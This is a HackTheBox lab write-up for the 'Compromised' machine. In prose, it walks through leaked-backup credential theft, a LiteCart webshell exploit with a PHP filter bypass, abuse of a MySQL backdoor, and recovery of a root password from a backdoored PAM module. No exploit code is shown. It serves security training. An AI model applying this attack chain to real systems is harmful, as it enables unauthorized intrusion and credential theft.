HackTheBox Writeup — Compromised

Hello Guys , I am Faisal Husaini. My username on HTB is “fa1sal” . Also join me on discord.

The IP of this box is 10.10.10.207

Running NMAP full port scan on it , we get

Got 2 Open Ports , Port 22 for SSH and Port 80 for HTTP

Moving onto the web part first

Checking out the web services , I get to see a shopping website

The website is running Litecart, running GoBuster against the web

The /backup directory seems to be very interesting as it contains a backup file by the name of a.tar.gz

Downloading the file to our local machine

Unzipping the file and checking the contents

Analyzing the code of the login.php, there is a commented out code which puts the username and password in a text file

Fetching the file from the web gives me a username and password

Searching for exploits for Litecart gives me a successful hit

Using the python exploit on the target with the credentials I got

It says the exploit uploaded the webshell and I can access through the given URL

But I am unable to run system command, due to some kind of PHP security, to confirm that , I modified the python exploit to upload a PHP file which will echo “Working!!!” and it works

I can escape the filter using the exploit below

Modifying the exploit and putting the above code and then re-running it

This time the exploit was successful and was able to run system command, so will use webwrap tool to use the parameter based shell commands using a wrapper

Enumerating the webroot, there is a file config.ini.php which contains the MySQL connection details

Now enumerating the database, it can be seen that it has been infected by a backdoor as there is exec_cmd function being used which is used for executing system command

Using this, I uploaded my SSH keys on MySQL user

Now connecting to the mysql user through the SSH keys I uploaded

Enumerating leads to a file which is readable by the current user as well as root but not world readable, so this can contain some information for good

Checking the file, there are some password logs here

Using these passwords combinations with the available user on the machine through SSH and one of them works

Time for priv esc

Since this machine was based on backdoor and compromise, so there might be possible rootkits

Checking for files with name backdoor, there is pam_unix.so file

Analyzing the file in Ghidra, it can be seen that the password is divided into two different strings in hex format

Decoding the hex strings, we get the divided password strings

Combining those strings leads to the password

zlke~U3Env82m2-

Using this password for root leads me to root

Hacker | Bug Hunter | Python Coder | Gamer | Reverse Engineering Lover

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store